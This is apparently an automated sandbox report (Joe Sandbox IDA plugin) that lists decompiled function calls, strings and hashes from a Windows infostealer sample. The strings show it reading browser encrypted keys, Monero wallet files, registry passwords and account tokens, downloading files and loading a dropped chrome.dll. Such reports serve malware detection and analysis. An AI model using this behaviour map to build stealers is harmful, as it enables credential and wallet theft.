                                  • Opcode Fuzzy Hash: 5814823e8682d754b2a34925609c48aafe3992dee021a152bbef09d0f4c84fac
                                  • Instruction Fuzzy Hash: 21C191B59001099BCB54EFA0DC99FEE737AEF54304F00459DE509AB242EB70EA85CFA5
                                  APIs
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C453C
                                  • lstrcat.KERNEL32(?,0147E518), ref: 006C455B
                                  • lstrcat.KERNEL32(?,?), ref: 006C456F
                                  • lstrcat.KERNEL32(?,0147D218), ref: 006C4583
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C8F20: GetFileAttributesA.KERNEL32(00000000,?,006B1B94,?,?,006D577C,?,?,006D0E22), ref: 006C8F2F
                                    • Part of subcall function 006BA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006BA489
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C9550: GlobalAlloc.KERNEL32(00000000,006C462D,006C462D), ref: 006C9563
                                  • StrStrA.SHLWAPI(?,0147E5C0), ref: 006C4643
                                  • GlobalFree.KERNEL32(?), ref: 006C4762
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA23F
                                    • Part of subcall function 006BA210: LocalAlloc.KERNEL32(00000040,?,?,?,006B4F3E,00000000,?), ref: 006BA251
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA27A
                                    • Part of subcall function 006BA210: LocalFree.KERNEL32(?,?,?,?,006B4F3E,00000000,?), ref: 006BA28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C46F3
                                  • StrCmpCA.SHLWAPI(?,006D08D2), ref: 006C4710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006C4722
                                  • lstrcat.KERNEL32(00000000,?), ref: 006C4735
                                  • lstrcat.KERNEL32(00000000,006D0FA0), ref: 006C4744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 469a296377318270d4db4b2bbb2df738d4dff8ce93a586b5cc56579ae783b82d
                                  • Instruction ID: 8cb272cf1a3ffd41c88e817c6ed20fdebbbfa80063c03eeb7e3f60b84e7c72d8
                                  • Opcode Fuzzy Hash: 469a296377318270d4db4b2bbb2df738d4dff8ce93a586b5cc56579ae783b82d
                                  • Instruction Fuzzy Hash: EB7156B6910208BBDB54EBE0DD99FEE777AAB88300F00459CF61697141EB34DB44CB65
                                  APIs
                                    • Part of subcall function 006B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006B12B4
                                    • Part of subcall function 006B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 006B12BB
                                    • Part of subcall function 006B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006B12D7
                                    • Part of subcall function 006B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006B12F5
                                    • Part of subcall function 006B12A0: RegCloseKey.ADVAPI32(?), ref: 006B12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 006B134F
                                  • lstrlen.KERNEL32(?), ref: 006B135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 006B1377
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 006B1465
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 006B14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 5b59d5c91d19928efccbc9e17a54e463a5d617837eab7741f13eb19c69f4b70a
                                  • Instruction ID: 06e5bcef74dd97e35b7efabc8c7b8a3c3782bc5deee038f636c8aa1a3ad4158e
                                  • Opcode Fuzzy Hash: 5b59d5c91d19928efccbc9e17a54e463a5d617837eab7741f13eb19c69f4b70a
                                  • Instruction Fuzzy Hash: 5A512FB1D5011C5BCB55EBA0DDA2FFD737EDB54304F40459CB60A62192EE306B88CBAA
                                  APIs
                                    • Part of subcall function 006B7330: memset.MSVCRT ref: 006B7374
                                    • Part of subcall function 006B7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006B739A
                                    • Part of subcall function 006B7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006B7411
                                    • Part of subcall function 006B7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006B746D
                                    • Part of subcall function 006B7330: GetProcessHeap.KERNEL32(00000000,?), ref: 006B74B2
                                    • Part of subcall function 006B7330: HeapFree.KERNEL32(00000000), ref: 006B74B9
                                  • lstrcat.KERNEL32(00000000,006D192C), ref: 006B7666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006B76A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 006B76BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006B76EF
                                  • lstrcat.KERNEL32(00000000,006D1934), ref: 006B7700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006B7733
                                  • lstrcat.KERNEL32(00000000,006D1938), ref: 006B774D
                                  • task.LIBCPMTD ref: 006B775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 8c70c8fd06d393abc09239e0ec277dc1e140a1f6a6d23f52f5500a10325e1892
                                  • Instruction ID: 7636402b35409f1f854d5ef650ff5d5af90075bb728d9062b065e5453d17f2dd
                                  • Opcode Fuzzy Hash: 8c70c8fd06d393abc09239e0ec277dc1e140a1f6a6d23f52f5500a10325e1892
                                  • Instruction Fuzzy Hash: B43160B1D18209EFDB04EFE4DCA5DFEB37AEB44301B204118F116673A1DA34A986EB54
                                  APIs
                                  • memset.MSVCRT ref: 006B7374
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006B739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006B7411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006B746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006B74B2
                                  • HeapFree.KERNEL32(00000000), ref: 006B74B9
                                  • task.LIBCPMTD ref: 006B75B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: 18aaeee0e42ba0ee5120b535820701badc265ff82d55e10eb87c954cc7fa51b7
                                  • Instruction ID: 29c270f22943ae86b102a227e00acb04b6f8f015b1c5a4cd06c39138a451b20a
                                  • Opcode Fuzzy Hash: 18aaeee0e42ba0ee5120b535820701badc265ff82d55e10eb87c954cc7fa51b7
                                  • Instruction Fuzzy Hash: 8A61FBB5D141689BDB24DB50CC55BD9B7B9BF44300F0081E9E649A7241EFB06BC9CFA4
                                  APIs
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                  • wsprintfA.USER32 ref: 006B9E7F
                                  • memset.MSVCRT ref: 006B9EED
                                  • lstrcat.KERNEL32(00000000,?), ref: 006B9F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 006B9F17
                                  • lstrcat.KERNEL32(00000000,006D12D8), ref: 006B9F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 006B9F7C
                                  • memset.MSVCRT ref: 006B9F9C
                                  • Sleep.KERNEL32(00001388), ref: 006BA013
                                    • Part of subcall function 006C99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C99C5
                                    • Part of subcall function 006C99A0: Process32First.KERNEL32(006BA056,00000128), ref: 006C99D9
                                    • Part of subcall function 006C99A0: Process32Next.KERNEL32(006BA056,00000128), ref: 006C99F2
                                    • Part of subcall function 006C99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C9A4E
                                    • Part of subcall function 006C99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9A6C
                                    • Part of subcall function 006C99A0: CloseHandle.KERNEL32(00000000), ref: 006C9A79
                                    • Part of subcall function 006C99A0: CloseHandle.KERNEL32(006BA056), ref: 006C9A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 3242155833-2746444292
                                  • Opcode ID: 14aeb2def45811680aa7a2f3a2edfecc4ae42b72b57797afb4915981df3f5f2b
                                  • Instruction ID: f407d5fbb3055edeb7196d84cb341ed462304a3a16ac37012cd2abcc6fc1126b
                                  • Opcode Fuzzy Hash: 14aeb2def45811680aa7a2f3a2edfecc4ae42b72b57797afb4915981df3f5f2b
                                  • Instruction Fuzzy Hash: 3051A8B1954308ABDB24DBA0DC89FEA7379AF44704F00459CB60DAB2C1EB75AB84CF55
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                  • InternetOpenA.WININET(006D0DFB,00000001,00000000,00000000,00000000), ref: 006B615F
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 006B61DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006B6203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 006B622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006B625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 006B6299
                                  • InternetCloseHandle.WININET(?), ref: 006B62A3
                                  • InternetCloseHandle.WININET(00000000), ref: 006B62B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: d32b206eff1672b0e3b57f16269fdc842326bc441b505ee26acfbf911eec0e1f
                                  • Instruction ID: 23d79ab06d58fa4c56d976cb8c6d0b419e6880f8b3ccb5e414996e37662842b3
                                  • Opcode Fuzzy Hash: d32b206eff1672b0e3b57f16269fdc842326bc441b505ee26acfbf911eec0e1f
                                  • Instruction Fuzzy Hash: 2C5152B1A14208ABEF20DF94DC49FEEB77AAB44305F104098F605A7281DB74AF85DF95
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 0073024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0073035B
                                  • CatchIt.LIBVCRUNTIME ref: 007303AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 007304C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: 5cb1454122c74192a6ac8a3622c2c36f2c0ad4cd9994a20917deae20281d5c06
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: FAB19C71C00219EFEF19DFA4D8A99AEBBB5BF05310F10416AE9116B213D338DA51CBD1
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • lstrlen.KERNEL32(00000000), ref: 006BBC6F
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 006BBC9D
                                  • lstrlen.KERNEL32(00000000), ref: 006BBD75
                                  • lstrlen.KERNEL32(00000000), ref: 006BBD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: c6900aceadc564c768ee95eb4490fb3c10d9907f6e337e42d4305bf4f096f2b0
                                  • Instruction ID: 0d05bc949545790cd33d98f98e9bc38abc6dacdec62f01729e8c145b357544ff
                                  • Opcode Fuzzy Hash: c6900aceadc564c768ee95eb4490fb3c10d9907f6e337e42d4305bf4f096f2b0
                                  • Instruction Fuzzy Hash: 41B11C72910108ABCB54EBE0DCA6FFE733AEF14308F40455DF50666191EE74AE48CB6A
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: fafeaa2ee3f9e5242fddcf99c70eda3747e75fc70507b956a222e87a81a55c53
                                  • Instruction ID: 4da395c4d7706a46e975f476889adc52a458e57d63e034a00376fe4333b85a0b
                                  • Opcode Fuzzy Hash: fafeaa2ee3f9e5242fddcf99c70eda3747e75fc70507b956a222e87a81a55c53
                                  • Instruction Fuzzy Hash: 2BF05E3291C209EFD3449FE0EC4DFACFB30EB04707F214599F61996790C671AA80AB55
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,006C08DC,C:\ProgramData\chrome.dll), ref: 006C9871
                                    • Part of subcall function 006BA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006BA098
                                  • StrCmpCA.SHLWAPI(00000000,01479038), ref: 006C0922
                                  • StrCmpCA.SHLWAPI(00000000,014790C8), ref: 006C0B79
                                  • StrCmpCA.SHLWAPI(00000000,01478FF8), ref: 006C0A0C
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006C0C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 006C0C30
                                  • C:\ProgramData\chrome.dll, xrefs: 006C08CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: 767bcb8f41b397d10aea242884de2fdf14aefb00a787105c24a07119f04485fc
                                  • Instruction ID: d2ebc050f2abac2a9c481f4be65d6cb40d055a42e840a22b58b86c4e957b4a0f
                                  • Opcode Fuzzy Hash: 767bcb8f41b397d10aea242884de2fdf14aefb00a787105c24a07119f04485fc
                                  • Instruction Fuzzy Hash: 8AA13F71A001089FCB68EFA4DA96FBD776AEF95304F50816DE40A4F252DA309A05CB96
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0072FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0072FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 0072FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0072FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 0072FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
